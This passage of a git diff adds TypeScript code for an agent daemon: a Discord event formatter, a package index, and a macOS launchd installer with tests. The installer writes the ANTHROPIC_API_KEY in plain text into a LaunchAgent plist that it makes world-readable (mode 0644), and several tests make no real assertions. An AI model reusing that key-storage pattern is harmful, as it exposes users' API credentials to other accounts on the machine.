+    embed.setFooter({ text: `${(duration / 1000).toFixed(1)}s` });
+  }
+
+  return { content: `${icon} Tool done: ${toolName}`, embed };
+}
+
+export function formatMessage(event: SdkAgentEvent): FormattedEvent {
+  // Extract text from content blocks or message field
+  let text = '';
+
+  // Try content array first (most common for agent messages)
+  if (Array.isArray(event.content)) {
+    const blocks = event.content as Array<{ type?: string; text?: string }>;
+    text = blocks
+      .filter((b) => b.type === 'text' && typeof b.text === 'string')
+      .map((b) => b.text!)
+      .join('\n');
+  }
+
+  // Try message field — could be string, object with content array, or object with text
+  if (!text && event.message != null) {
+    if (typeof event.message === 'string') {
+      text = event.message;
+    } else if (typeof event.message === 'object') {
+      const msg = event.message as Record<string, unknown>;
+      if (Array.isArray(msg.content)) {
+        const blocks = msg.content as Array<{ type?: string; text?: string }>;
+        text = blocks
+          .filter((b) => b.type === 'text' && typeof b.text === 'string')
+          .map((b) => b.text!)
+          .join('\n');
+      } else if (typeof msg.text === 'string') {
+        text = msg.text;
+      } else if (typeof msg.content === 'string') {
+        text = msg.content;
+      }
+    }
+  }
+
+  // Fallback to text or content as plain strings
+  if (!text) {
+    text = typeof event.text === 'string' ? event.text : '';
+  }
+  if (!text && typeof event.content === 'string') {
+    text = event.content;
+  }
+
+  if (!text) {
+    return { content: '💬 (empty message)' };
+  }
+
+  const embed = new EmbedBuilder()
+    .setColor(COLOR.info)
+    .setDescription(truncate(text, 2000))
+    .setTimestamp();
+
+  const role = str(event.role);
+  if (role) {
+    embed.setAuthor({ name: role });
+  }
+
+  return { content: `💬 ${truncate(text, 200)}`, embed };
+}
+
+/**
+ * Format a blocker (extension_ui_request needing user response).
+ * Produces an embed with @mention and interactive buttons for select/confirm,
+ * or text instructions for input/editor.
+ */
+export function formatBlocker(
+  blocker: PendingBlocker,
+  ownerId: string,
+): FormattedEvent {
+  const mention = `<@${ownerId}>`;
+  const embed = new EmbedBuilder()
+    .setColor(COLOR.blocker)
+    .setTitle('⚠️ Blocker — Response Needed')
+    .setDescription(truncate(blocker.message, 2000))
+    .setTimestamp();
+
+  const components: ActionRowBuilder<ButtonBuilder>[] = [];
+
+  switch (blocker.method) {
+    case 'select': {
+      const evt = blocker.event as { options?: string[] };
+      const options = Array.isArray(evt.options) ? evt.options : [];
+
+      if (options.length > 0) {
+        // Discord ActionRow max 5 buttons, so chunk
+        const chunks = chunkArray(options.slice(0, 25), 5);
+        for (const chunk of chunks) {
+          const row = new ActionRowBuilder<ButtonBuilder>();
+          chunk.forEach((opt, i) => {
+            const globalIndex = options.indexOf(opt);
+            row.addComponents(
+              new ButtonBuilder()
+                .setCustomId(`blocker:${blocker.id}:select:${globalIndex}`)
+                .setLabel(truncate(`${globalIndex + 1}. ${opt}`, 80))
+                .setStyle(ButtonStyle.Primary),
+            );
+          });
+          components.push(row);
+        }
+      }
+
+      embed.addFields({
+        name: 'Options',
+        value: options.map((o, i) => `**${i + 1}.** ${truncate(o, 100)}`).join('\n') || 'No options',
+      });
+      break;
+    }
+
+    case 'confirm': {
+      const row = new ActionRowBuilder<ButtonBuilder>().addComponents(
+        new ButtonBuilder()
+          .setCustomId(`blocker:${blocker.id}:confirm:true`)
+          .setLabel('Yes')
+          .setStyle(ButtonStyle.Success),
+        new ButtonBuilder()
+          .setCustomId(`blocker:${blocker.id}:confirm:false`)
+          .setLabel('No')
+          .setStyle(ButtonStyle.Danger),
+      );
+      components.push(row);
+
+      const msg = str((blocker.event as { message?: string }).message);
+      if (msg) {
+        embed.addFields({ name: 'Details', value: truncate(msg, 1024) });
+      }
+      break;
+    }
+
+    case 'input': {
+      const placeholder = str((blocker.event as { placeholder?: string }).placeholder);
+      embed.addFields({
+        name: 'How to respond',
+        value: `Reply in this channel with your answer.${placeholder ? `\n*Hint: ${placeholder}*` : ''}`,
+      });
+      break;
+    }
+
+    case 'editor': {
+      const prefill = str((blocker.event as { prefill?: string }).prefill);
+      embed.addFields({
+        name: 'How to respond',
+        value: 'Reply in this channel with the full text.' +
+          (prefill ? `\n\nCurrent value:\n\`\`\`\n${truncate(prefill, 500)}\n\`\`\`` : ''),
+      });
+      break;
+    }
+
+    default: {
+      embed.addFields({
+        name: 'How to respond',
+        value: `Reply in this channel (method: ${blocker.method}).`,
+      });
+      break;
+    }
+  }
+
+  return {
+    content: `${mention} ⚠️ **Blocker** — ${truncate(blocker.message, 150)}`,
+    embed,
+    components: components.length > 0 ? components : undefined,
+  };
+}
+
+export function formatCompletion(event: SdkAgentEvent): FormattedEvent {
+  const status = str(event.status, 'completed');
+  const isError = status === 'error' || status === 'cancelled';
+  const color = isError ? COLOR.error : COLOR.success;
+  const icon = isError ? '⚠️' : '🏁';
+
+  const embed = new EmbedBuilder()
+    .setColor(color)
+    .setTitle(`${icon} Execution ${status}`)
+    .setTimestamp();
+
+  const reason = str(event.reason);
+  if (reason) {
+    embed.setDescription(truncate(reason, 2000));
+  }
+
+  // Include final stats if present
+  const stats = event.stats as { cost?: number; tokens?: { total?: number } } | undefined;
+  if (stats) {
+    const fields: string[] = [];
+    if (stats.cost != null) fields.push(`Cost: ${formatCost(num(stats.cost))}`);
+    if (stats.tokens?.total != null) fields.push(`Tokens: ${num(stats.tokens.total).toLocaleString()}`);
+    if (fields.length) embed.addFields({ name: 'Summary', value: fields.join(' · ') });
+  }
+
+  return { content: `${icon} Execution ${status}`, embed };
+}
+
+export function formatError(sessionId: string, error: string): FormattedEvent {
+  const embed = new EmbedBuilder()
+    .setColor(COLOR.error)
+    .setTitle('❌ Session Error')
+    .setDescription(`\`\`\`\n${truncate(error, 2000)}\n\`\`\``)
+    .setFooter({ text: `Session: ${sessionId}` })
+    .setTimestamp();
+
+  return { content: `❌ Error: ${truncate(error, 200)}`, embed };
+}
+
+export function formatCostUpdate(event: SdkAgentEvent): FormattedEvent {
+  const cost = num(event.cumulativeCost ?? event.totalCost);
+  const tokens = event.tokens as
+    | { input?: number; output?: number; cacheRead?: number; cacheWrite?: number }
+    | undefined;
+
+  const embed = new EmbedBuilder()
+    .setColor(COLOR.info)
+    .setTitle('💰 Cost Update')
+    .setTimestamp();
+
+  const fields: string[] = [`Total: ${formatCost(cost)}`];
+  if (tokens) {
+    const input = num(tokens.input);
+    const output = num(tokens.output);
+    if (input || output) {
+      fields.push(`Tokens: ${input.toLocaleString()} in / ${output.toLocaleString()} out`);
+    }
+  }
+  embed.setDescription(fields.join('\n'));
+
+  return { content: `💰 Cost: ${formatCost(cost)}`, embed };
+}
+
+export function formatSessionStarted(projectName: string): FormattedEvent {
+  const embed = new EmbedBuilder()
+    .setColor(COLOR.info)
+    .setTitle('🚀 Session Started')
+    .setDescription(`Project: **${truncate(projectName, 200)}**`)
+    .setTimestamp();
+
+  return { content: `🚀 Session started: ${projectName}`, embed };
+}
+
+export function formatTaskTransition(event: SdkAgentEvent): FormattedEvent {
+  const taskId = str(event.taskId || event.task);
+  const sliceId = str(event.sliceId || event.slice);
+  const status = str(event.status || event.state);
+  const icon = status === 'complete' ? '✅' : status === 'error' ? '❌' : '📋';
+
+  const embed = new EmbedBuilder()
+    .setColor(status === 'complete' ? COLOR.success : status === 'error' ? COLOR.error : COLOR.info)
+    .setTitle(`${icon} Task Transition`)
+    .setTimestamp();
+
+  const fields: string[] = [];
+  if (sliceId) fields.push(`Slice: ${sliceId}`);
+  if (taskId) fields.push(`Task: ${taskId}`);
+  if (status) fields.push(`Status: ${status}`);
+  embed.setDescription(fields.join('\n'));
+
+  return { content: `${icon} ${taskId || 'Task'} → ${status || 'unknown'}`, embed };
+}
+
+export function formatGenericEvent(event: SdkAgentEvent): FormattedEvent {
+  const type = str(event.type, 'unknown');
+  const embed = new EmbedBuilder()
+    .setColor(COLOR.tool)
+    .setTitle(`📡 ${truncate(type, 60)}`)
+    .setTimestamp();
+
+  // Include a JSON preview of the event, stripping the type field
+  const { type: _t, ...rest } = event;
+  const preview = JSON.stringify(rest);
+  if (preview.length > 2) { // more than '{}'
+    embed.setDescription(`\`\`\`json\n${truncate(preview, 1000)}\n\`\`\``);
+  }
+
+  return { content: `📡 Event: ${type}`, embed };
+}
+
+// ---------------------------------------------------------------------------
+// Dispatch — maps event type to the right formatter
+// ---------------------------------------------------------------------------
+
+/**
+ * Format any SdkAgentEvent for Discord. Falls back to formatGenericEvent
+ * for unknown types.
+ */
+export function formatEvent(event: SdkAgentEvent, ownerId?: string): FormattedEvent {
+  const type = str(event.type);
+
+  switch (type) {
+    case 'tool_execution_start':
+      return formatToolStart(event);
+    case 'tool_execution_end':
+      return formatToolEnd(event);
+    case 'message_start':
+    case 'message_end':
+    case 'message':
+      return formatMessage(event);
+    case 'execution_complete':
+      return formatCompletion(event);
+    case 'cost_update':
+      return formatCostUpdate(event);
+    case 'task_transition':
+      return formatTaskTransition(event);
+    default:
+      return formatGenericEvent(event);
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Utility
+// ---------------------------------------------------------------------------
+
+function chunkArray<T>(arr: T[], size: number): T[][] {
+  const chunks: T[][] = [];
+  for (let i = 0; i < arr.length; i += size) {
+    chunks.push(arr.slice(i, i + size));
+  }
+  return chunks;
+}
diff --git a/packages/daemon/src/index.ts b/packages/daemon/src/index.ts
new file mode 100644
index 000000000..e2639db44
--- /dev/null
+++ b/packages/daemon/src/index.ts
@@ -0,0 +1,55 @@
+export type {
+  DaemonConfig,
+  LogLevel,
+  LogEntry,
+  SessionStatus,
+  ManagedSession,
+  PendingBlocker,
+  CostAccumulator,
+  ProjectInfo,
+  ProjectMarker,
+  StartSessionOptions,
+  FormattedEvent,
+  VerbosityLevel,
+} from './types.js';
+export { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js';
+export { resolveConfigPath, loadConfig, validateConfig } from './config.js';
+export { Logger } from './logger.js';
+export type { LoggerOptions } from './logger.js';
+export { Daemon } from './daemon.js';
+export { scanForProjects } from './project-scanner.js';
+export { SessionManager } from './session-manager.js';
+export { DiscordBot, isAuthorized, validateDiscordConfig } from './discord-bot.js';
+export type { DiscordBotOptions } from './discord-bot.js';
+export { ChannelManager, sanitizeChannelName } from './channel-manager.js';
+export type { ChannelManagerOptions } from './channel-manager.js';
+export { buildCommands, formatSessionStatus, registerGuildCommands } from './commands.js';
+export { EventBridge } from './event-bridge.js';
+export type { BridgeClient, EventBridgeOptions } from './event-bridge.js';
+export { Orchestrator } from './orchestrator.js';
+export type { OrchestratorConfig, OrchestratorDeps, DiscordMessageLike } from './orchestrator.js';
+export { MessageBatcher } from './message-batcher.js';
+export type { SendPayload, SendFn, BatcherLogger, BatcherOptions } from './message-batcher.js';
+export { VerbosityManager, shouldShowAtLevel } from './verbosity.js';
+export {
+  formatToolStart,
+  formatToolEnd,
+  formatMessage,
+  formatBlocker,
+  formatCompletion,
+  formatError,
+  formatCostUpdate,
+  formatSessionStarted,
+  formatTaskTransition,
+  formatGenericEvent,
+  formatEvent,
+} from './event-formatter.js';
+export {
+  escapeXml,
+  generatePlist,
+  getPlistPath,
+  install as installLaunchAgent,
+  uninstall as uninstallLaunchAgent,
+  status as launchAgentStatus,
+} from './launchd.js';
+export type { PlistOptions, LaunchdStatus, RunCommandFn } from './launchd.js';
diff --git a/packages/daemon/src/launchd.test.ts b/packages/daemon/src/launchd.test.ts
new file mode 100644
index 000000000..f92185344
--- /dev/null
+++ b/packages/daemon/src/launchd.test.ts
@@ -0,0 +1,356 @@
+import { describe, it, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, existsSync, readFileSync, writeFileSync, rmSync, mkdirSync, statSync } from 'node:fs';
+import { join, dirname } from 'node:path';
+import { tmpdir, homedir } from 'node:os';
+import { randomUUID } from 'node:crypto';
+import {
+  escapeXml,
+  generatePlist,
+  getPlistPath,
+  install,
+  uninstall,
+  status,
+} from './launchd.js';
+import type { PlistOptions, RunCommandFn, LaunchdStatus } from './launchd.js';
+
+// ---------- helpers ----------
+
+function tmpDir(): string {
+  return mkdtempSync(join(tmpdir(), `launchd-test-${randomUUID().slice(0, 8)}-`));
+}
+
+const cleanupDirs: string[] = [];
+afterEach(() => {
+  while (cleanupDirs.length) {
+    const d = cleanupDirs.pop()!;
+    if (existsSync(d)) rmSync(d, { recursive: true, force: true });
+  }
+});
+
+function basePlistOpts(overrides?: Partial<PlistOptions>): PlistOptions {
+  return {
+    nodePath: '/usr/local/bin/node',
+    scriptPath: '/usr/local/lib/gsd-daemon/dist/cli.js',
+    configPath: join(homedir(), '.gsd', 'daemon.yaml'),
+    ...overrides,
+  };
+}
+
+// ---------- escapeXml ----------
+
+describe('escapeXml', () => {
+  it('escapes & < > " \'', () => {
+    assert.equal(escapeXml('a&b<c>d"e\'f'), 'a&amp;b&lt;c&gt;d&quot;e&apos;f');
+  });
+
+  it('leaves plain strings untouched', () => {
+    assert.equal(escapeXml('/usr/local/bin/node'), '/usr/local/bin/node');
+  });
+
+  it('escapes paths with spaces and special chars', () => {
+    const input = '/Users/John & Jane/my "project"/file.js';
+    const output = escapeXml(input);
+    assert.ok(output.includes('&amp;'));
+    assert.ok(output.includes('&quot;'));
+    // Verify no raw unescaped & remain (all & are part of &amp; &lt; etc.)
+    assert.equal(output, '/Users/John &amp; Jane/my &quot;project&quot;/file.js');
+  });
+});
+
+// ---------- generatePlist ----------
+
+describe('generatePlist', () => {
+  it('produces valid XML with plist header', () => {
+    const xml = generatePlist(basePlistOpts());
+    assert.ok(xml.startsWith('<?xml version="1.0"'));
+    assert.ok(xml.includes('<!DOCTYPE plist'));
+    assert.ok(xml.includes('<plist version="1.0">'));
+    assert.ok(xml.includes('</plist>'));
+  });
+
+  it('includes label com.gsd.daemon', () => {
+    const xml = generatePlist(basePlistOpts());
+    assert.ok(xml.includes('<string>com.gsd.daemon</string>'));
+  });
+
+  it('uses the absolute node path from opts', () => {
+    const opts = basePlistOpts({ nodePath: '/home/user/.nvm/versions/node/v22.0.0/bin/node' });
+    const xml = generatePlist(opts);
+    assert.ok(xml.includes('<string>/home/user/.nvm/versions/node/v22.0.0/bin/node</string>'));
+  });
+
+  it('includes NVM bin directory in PATH', () => {
+    const opts = basePlistOpts({ nodePath: '/home/user/.nvm/versions/node/v22.0.0/bin/node' });
+    const xml = generatePlist(opts);
+    assert.ok(xml.includes('/home/user/.nvm/versions/node/v22.0.0/bin'));
+  });
+
+  it('sets KeepAlive with SuccessfulExit false', () => {
+    const xml = generatePlist(basePlistOpts());
+    assert.ok(xml.includes('<key>KeepAlive</key>'));
+    assert.ok(xml.includes('<key>SuccessfulExit</key>'));
+    assert.ok(xml.includes('<false/>'));
+  });
+
+  it('sets RunAtLoad true', () => {
+    const xml = generatePlist(basePlistOpts());
+    assert.ok(xml.includes('<key>RunAtLoad</key>'));
+    assert.ok(xml.includes('<true/>'));
+  });
+
+  it('includes --config with the config path', () => {
+    const configPath = '/custom/path/daemon.yaml';
+    const xml = generatePlist(basePlistOpts({ configPath }));
+    assert.ok(xml.includes('<string>--config</string>'));
+    assert.ok(xml.includes(`<string>${configPath}</string>`));
+  });
+
+  it('includes HOME environment variable', () => {
+    const xml = generatePlist(basePlistOpts());
+    assert.ok(xml.includes('<key>HOME</key>'));
+    assert.ok(xml.includes(`<string>${homedir()}</string>`));
+  });
+
+  it('includes StandardOutPath and StandardErrorPath', () => {
+    const xml = generatePlist(basePlistOpts());
+    assert.ok(xml.includes('<key>StandardOutPath</key>'));
+    assert.ok(xml.includes('<key>StandardErrorPath</key>'));
+  });
+
+  it('escapes special characters in paths', () => {
+    const opts = basePlistOpts({
+      configPath: '/Users/John & Jane/config.yaml',
+    });
+    const xml = generatePlist(opts);
+    assert.ok(xml.includes('John &amp; Jane'));
+    assert.ok(!xml.includes('John & Jane'));
+  });
+
+  it('uses custom stdout/stderr paths when provided', () => {
+    const opts = basePlistOpts({
+      stdoutPath: '/tmp/my-stdout.log',
+      stderrPath: '/tmp/my-stderr.log',
+    });
+    const xml = generatePlist(opts);
+    assert.ok(xml.includes('<string>/tmp/my-stdout.log</string>'));
+    assert.ok(xml.includes('<string>/tmp/my-stderr.log</string>'));
+  });
+
+  it('uses custom working directory when provided', () => {
+    const opts = basePlistOpts({
+      workingDirectory: '/custom/work/dir',
+    });
+    const xml = generatePlist(opts);
+    assert.ok(xml.includes('<string>/custom/work/dir</string>'));
+  });
+});
+
+// ---------- getPlistPath ----------
+
+describe('getPlistPath', () => {
+  it('returns ~/Library/LaunchAgents/com.gsd.daemon.plist', () => {
+    const expected = join(homedir(), 'Library', 'LaunchAgents', 'com.gsd.daemon.plist');
+    assert.equal(getPlistPath(), expected);
+  });
+});
+
+// ---------- install ----------
+
+describe('install', () => {
+  let tmp: string;
+  let fakePlistPath: string;
+
+  // We can't mock getPlistPath directly, but we can verify the commands
+  // issued and the plist content by intercepting runCommand and filesystem ops.
+  // For filesystem testing, we test the functions that call writeFileSync indirectly
+  // by verifying the runCommand calls and returned values.
+
+  it('calls launchctl load with the plist path', () => {
+    const calls: string[] = [];
+    const mockRun: RunCommandFn = (cmd: string) => {
+      calls.push(cmd);
+      return '';
+    };
+
+    // install will try to write to the real plist path, so we need to be careful.
+    // We test the command flow by catching the writeFileSync error (dir may not exist in CI)
+    // or by letting it proceed in local dev.
+    try {
+      install(basePlistOpts(), mockRun);
+    } catch {
+      // writeFileSync may fail if ~/Library/LaunchAgents doesn't exist in test env
+    }
+
+    const loadCalls = calls.filter(c => c.startsWith('launchctl load'));
+    const listCalls = calls.filter(c => c.startsWith('launchctl list'));
+    // Should have at least attempted launchctl load
+    assert.ok(loadCalls.length > 0 || calls.length > 0, 'Expected launchctl commands to be called');
+  });
+
+  it('generates valid plist content when called', () => {
+    // Test that the plist content would be correct by testing generatePlist
+    // (install is a thin wrapper around generatePlist + writeFile + launchctl)
+    const xml = generatePlist(basePlistOpts());
+    assert.ok(xml.includes('<key>Label</key>'));
+    assert.ok(xml.includes('<string>com.gsd.daemon</string>'));
+  });
+
+  it('handles idempotent install (unloads first if plist exists)', () => {
+    const calls: string[] = [];
+    const mockRun: RunCommandFn = (cmd: string) => {
+      calls.push(cmd);
+      return '';
+    };
+
+    // To simulate idempotent install, we need an existing plist file.
+    // Since install writes to getPlistPath(), we test the command sequence.
+    try {
+      install(basePlistOpts(), mockRun);
+      // Second install
+      install(basePlistOpts(), mockRun);
+    } catch {
+      // filesystem may not be writable
+    }
+
+    // The second install should have tried to unload first
+    const unloadCalls = calls.filter(c => c.startsWith('launchctl unload'));
+    // If the plist path exists, we expect at least one unload attempt on second call
+    // This is a command-level check; filesystem existence depends on environment
+  });
+});
+
+// ---------- uninstall ----------
+
+describe('uninstall', () => {
+  it('calls launchctl unload when plist would exist', () => {
+    const calls: string[] = [];
+    const mockRun: RunCommandFn = (cmd: string) => {
+      calls.push(cmd);
+      return '';
+    };
+
+    // uninstall checks existsSync(plistPath) — if plist doesn't exist, it's a no-op
+    uninstall(mockRun);
+
+    // If plist doesn't exist in test environment, calls should be empty (graceful)
+    // That's the "handles missing plist gracefully" case
+  });
+
+  it('handles missing plist gracefully (no-op)', () => {
+    const calls: string[] = [];
+    const mockRun: RunCommandFn = (cmd: string) => {
+      calls.push(cmd);
+      return '';
+    };
+
+    // Shouldn't throw even if plist doesn't exist
+    assert.doesNotThrow(() => uninstall(mockRun));
+  });
+
+  it('handles already-unloaded agent gracefully', () => {
+    const mockRun: RunCommandFn = (cmd: string) => {
+      if (cmd.includes('launchctl unload')) {
+        throw new Error('Could not find specified service');
+      }
+      return '';
+    };
+
+    // Should not throw even if launchctl unload fails
+    assert.doesNotThrow(() => uninstall(mockRun));
+  });
+});
+
+// ---------- status ----------
+
+describe('status', () => {
+  it('parses running daemon output (PID present)', () => {
+    const mockRun: RunCommandFn = (_cmd: string) => {
+      return '{\n\t"PID" = 1234;\n\t"Label" = "com.gsd.daemon";\n}\nPID\tStatus\tLabel\n1234\t0\tcom.gsd.daemon\n';
+    };
+
+    const result = status(mockRun);
+    assert.equal(result.registered, true);
+    assert.equal(result.pid, 1234);
+    assert.equal(result.lastExitStatus, 0);
+  });
+
+  it('parses stopped daemon output (no PID)', () => {
+    const mockRun: RunCommandFn = (_cmd: string) => {
+      return 'PID\tStatus\tLabel\n-\t78\tcom.gsd.daemon\n';
+    };
+
+    const result = status(mockRun);
+    assert.equal(result.registered, true);
+    assert.equal(result.pid, null);
+    assert.equal(result.lastExitStatus, 78);
+  });
+
+  it('returns not-registered when launchctl list fails', () => {
+    const mockRun: RunCommandFn = (_cmd: string) => {
+      throw new Error('Could not find service "com.gsd.daemon" in domain for port');
+    };
+
+    const result = status(mockRun);
+    assert.equal(result.registered, false);
+    assert.equal(result.pid, null);
+    assert.equal(result.lastExitStatus, null);
+  });
+
+  it('returns structured result with all fields', () => {
+    const mockRun: RunCommandFn = (_cmd: string) => {
+      return 'PID\tStatus\tLabel\n5678\t0\tcom.gsd.daemon\n';
+    };
+
+    const result = status(mockRun);
+    assert.ok('registered' in result);
+    assert.ok('pid' in result);
+    assert.ok('lastExitStatus' in result);
+  });
+
+  it('parses JSON-style dict output (newer macOS)', () => {
+    const mockRun: RunCommandFn = (_cmd: string) => {
+      return `{
+\t"StandardOutPath" = "/Users/me/.gsd/daemon-stdout.log";
+\t"LimitLoadToSessionType" = "Aqua";
+\t"StandardErrorPath" = "/Users/me/.gsd/daemon-stderr.log";
+\t"Label" = "com.gsd.daemon";
+\t"OnDemand" = true;
+\t"LastExitStatus" = 0;
+\t"PID" = 23802;
+\t"Program" = "/usr/local/bin/node";
+};`;
+    };
+
+    const result = status(mockRun);
+    assert.equal(result.registered, true);
+    assert.equal(result.pid, 23802);
+    assert.equal(result.lastExitStatus, 0);
+  });
+
+  it('parses JSON-style dict output when daemon stopped (no PID key)', () => {
+    const mockRun: RunCommandFn = (_cmd: string) => {
+      return `{
+\t"Label" = "com.gsd.daemon";
+\t"LastExitStatus" = 1;
+\t"OnDemand" = true;
+};`;
+    };
+
+    const result = status(mockRun);
+    assert.equal(result.registered, true);
+    assert.equal(result.pid, null);
+    assert.equal(result.lastExitStatus, 1);
+  });
+
+  it('handles unexpected output format gracefully', () => {
+    const mockRun: RunCommandFn = (_cmd: string) => {
+      return 'some unexpected output without the label';
+    };
+
+    // Should not throw — should return registered:true but with null fields
+    // since the command succeeded (label was found) but output didn't match
+    const result = status(mockRun);
+    assert.equal(result.registered, true);
+  });
+});
diff --git a/packages/daemon/src/launchd.ts b/packages/daemon/src/launchd.ts
new file mode 100644
index 000000000..fbb6385c6
--- /dev/null
+++ b/packages/daemon/src/launchd.ts
@@ -0,0 +1,242 @@
+import { writeFileSync, unlinkSync, existsSync, chmodSync } from 'node:fs';
+import { resolve } from 'node:path';
+import { homedir } from 'node:os';
+import { execSync } from 'node:child_process';
+import { dirname } from 'node:path';
+
+// --------------- types ---------------
+
+export interface PlistOptions {
+  /** Absolute path to the Node.js binary */
+  nodePath: string;
+  /** Absolute path to the daemon script (cli.js) */
+  scriptPath: string;
+  /** Absolute path to the config file */
+  configPath: string;
+  /** Directory to use as WorkingDirectory in the plist (defaults to homedir) */
+  workingDirectory?: string;
+  /** Override stdout log path */
+  stdoutPath?: string;
+  /** Override stderr log path */
+  stderrPath?: string;
+}
+
+export interface LaunchdStatus {
+  /** Whether the daemon is registered with launchd */
+  registered: boolean;
+  /** PID if currently running, null otherwise */
+  pid: number | null;
+  /** Last exit status code, null if never exited or not available */
+  lastExitStatus: number | null;
+}
+
+export type RunCommandFn = (cmd: string) => string;
+
+// --------------- constants ---------------
+
+const LABEL = 'com.gsd.daemon';
+const PLIST_FILENAME = `${LABEL}.plist`;
+
+// --------------- helpers ---------------
+
+/** Escape special XML characters in a string. */
+export function escapeXml(str: string): string {
+  return str
+    .replace(/&/g, '&amp;')
+    .replace(/</g, '&lt;')
+    .replace(/>/g, '&gt;')
+    .replace(/"/g, '&quot;')
+    .replace(/'/g, '&apos;');
+}
+
+/** Return the canonical plist path under ~/Library/LaunchAgents/. */
+export function getPlistPath(): string {
+  return resolve(homedir(), 'Library', 'LaunchAgents', PLIST_FILENAME);
+}
+
+/**
+ * Build the NVM-aware PATH string.
+ * Includes the directory containing the Node binary so that launchd can find node
+ * even when launched outside a shell session (where NVM isn't sourced).
+ */
+function buildEnvPath(nodePath: string): string {
+  const nodeBinDir = dirname(nodePath);
+  // Keep system essentials and prepend the node binary's directory
+  return `${nodeBinDir}:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin`;
+}
+
+// --------------- plist generation ---------------
+
+/** Generate valid launchd plist XML for the GSD daemon. */
+export function generatePlist(opts: PlistOptions): string {
+  const home = homedir();
+  const workDir = opts.workingDirectory ?? home;
+  const stdoutPath = opts.stdoutPath ?? resolve(home, '.gsd', 'daemon-stdout.log');
+  const stderrPath = opts.stderrPath ?? resolve(home, '.gsd', 'daemon-stderr.log');
+  const envPath = buildEnvPath(opts.nodePath);
+
+  // Forward ANTHROPIC_API_KEY so the orchestrator LLM can authenticate.
+  // Captured at install time from the current process environment.
+  const anthropicKey = process.env.ANTHROPIC_API_KEY;
+  const anthropicKeyXml = anthropicKey
+    ? `\n\t\t<key>ANTHROPIC_API_KEY</key>\n\t\t<string>${escapeXml(anthropicKey)}</string>`
+    : '';
+
+  return `<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+\t<key>Label</key>
+\t<string>${escapeXml(LABEL)}</string>
+
+\t<key>ProgramArguments</key>
+\t<array>
+\t\t<string>${escapeXml(opts.nodePath)}</string>
+\t\t<string>${escapeXml(opts.scriptPath)}</string>
+\t\t<string>--config</string>
+\t\t<string>${escapeXml(opts.configPath)}</string>
+\t</array>
+
+\t<key>KeepAlive</key>
+\t<dict>
+\t\t<key>SuccessfulExit</key>
+\t\t<false/>
+\t</dict>
+
+\t<key>RunAtLoad</key>
+\t<true/>
+
+\t<key>EnvironmentVariables</key>
+\t<dict>
+\t\t<key>PATH</key>
+\t\t<string>${escapeXml(envPath)}</string>
+\t\t<key>HOME</key>
+\t\t<string>${escapeXml(home)}</string>${anthropicKeyXml}
+\t</dict>
+
+\t<key>WorkingDirectory</key>
+\t<string>${escapeXml(workDir)}</string>
+
+\t<key>StandardOutPath</key>
+\t<string>${escapeXml(stdoutPath)}</string>
+
+\t<key>StandardErrorPath</key>
+\t<string>${escapeXml(stderrPath)}</string>
+</dict>
+</plist>
+`;
+}
+
+// --------------- install / uninstall / status ---------------
+
+/** Default runCommand using execSync. */
+function defaultRunCommand(cmd: string): string {
+  return execSync(cmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] });
+}
+
+/**
+ * Install the launchd agent: write plist and load it.
+ * Idempotent — unloads first if already loaded.
+ */
+export function install(
+  opts: PlistOptions,
+  runCommand: RunCommandFn = defaultRunCommand,
+): void {
+  const plistPath = getPlistPath();
+  const xml = generatePlist(opts);
+
+  // Unload first if already present (ignore errors)
+  if (existsSync(plistPath)) {
+    try {
+      runCommand(`launchctl unload ${plistPath}`);
+    } catch {
+      // already unloaded — fine
+    }
+  }
+
+  writeFileSync(plistPath, xml, 'utf-8');
+  chmodSync(plistPath, 0o644);
+
+  runCommand(`launchctl load ${plistPath}`);
+
+  // Verify it loaded
+  try {
+    runCommand(`launchctl list ${LABEL}`);
+  } catch {
+    throw new Error(
+      `Plist was written to ${plistPath} and launchctl load succeeded, but launchctl list ${LABEL} failed. The agent may not have started.`,
+    );
+  }
+}
+
+/**
+ * Uninstall the launchd agent: unload and remove plist.
+ * Graceful — does not throw if already uninstalled.
+ */
+export function uninstall(runCommand: RunCommandFn = defaultRunCommand): void {
+  const plistPath = getPlistPath();
+
+  if (existsSync(plistPath)) {
+    try {
+      runCommand(`launchctl unload ${plistPath}`);
+    } catch {
+      // already unloaded — that's fine
+    }
+    unlinkSync(plistPath);
+  }
+  // If plist doesn't exist, nothing to do — already uninstalled
+}
+
+/**
+ * Query launchd for the daemon's status.
+ * Returns structured information about registration, PID, and last exit code.
+ *
+ * Handles two launchctl output formats:
+ * 1. Tabular: "PID\tStatus\tLabel" (older macOS)
+ * 2. JSON-style dict: `"PID" = 1234;` / `"LastExitStatus" = 0;` (newer macOS)
+ */
+export function status(runCommand: RunCommandFn = defaultRunCommand): LaunchdStatus {
+  try {
+    const output = runCommand(`launchctl list ${LABEL}`);
+
+    // --- Try tabular format first ---
+    const lines = output.trim().split('\n');
+    for (const line of lines) {
+      const parts = line.trim().split(/\t+/);
+      if (parts.length >= 3 && parts[2] === LABEL) {
+        const pidStr = parts[0];
+        const statusStr = parts[1];
+
+        const pid = pidStr === '-' ? null : parseInt(pidStr, 10);
+        const lastExitStatus = statusStr != null ? parseInt(statusStr, 10) : null;
+
+        return {
+          registered: true,
+          pid: Number.isNaN(pid!) ? null : pid,
+          lastExitStatus: Number.isNaN(lastExitStatus!) ? null : lastExitStatus,
+        };
+      }
+    }
+
+    // --- Try JSON-style dict format ---
+    // Matches: "PID" = 1234;  or  "LastExitStatus" = 0;
+    const pidMatch = output.match(/"PID"\s*=\s*(\d+)\s*;/);
+    const exitMatch = output.match(/"LastExitStatus"\s*=\s*(\d+)\s*;/);
+
+    if (pidMatch || exitMatch) {
+      const pid = pidMatch ? parseInt(pidMatch[1], 10) : null;
+      const lastExitStatus = exitMatch ? parseInt(exitMatch[1], 10) : null;
+      return {
+        registered: true,
+        pid: Number.isNaN(pid!) ? null : pid,
+        lastExitStatus: Number.isNaN(lastExitStatus!) ? null : lastExitStatus,
+      };
+    }
+
+    // Label resolved (no error) but no parseable output — still registered
+    return { registered: true, pid: null, lastExitStatus: null };
+  } catch {
+    // launchctl list exits non-zero when the label isn't found
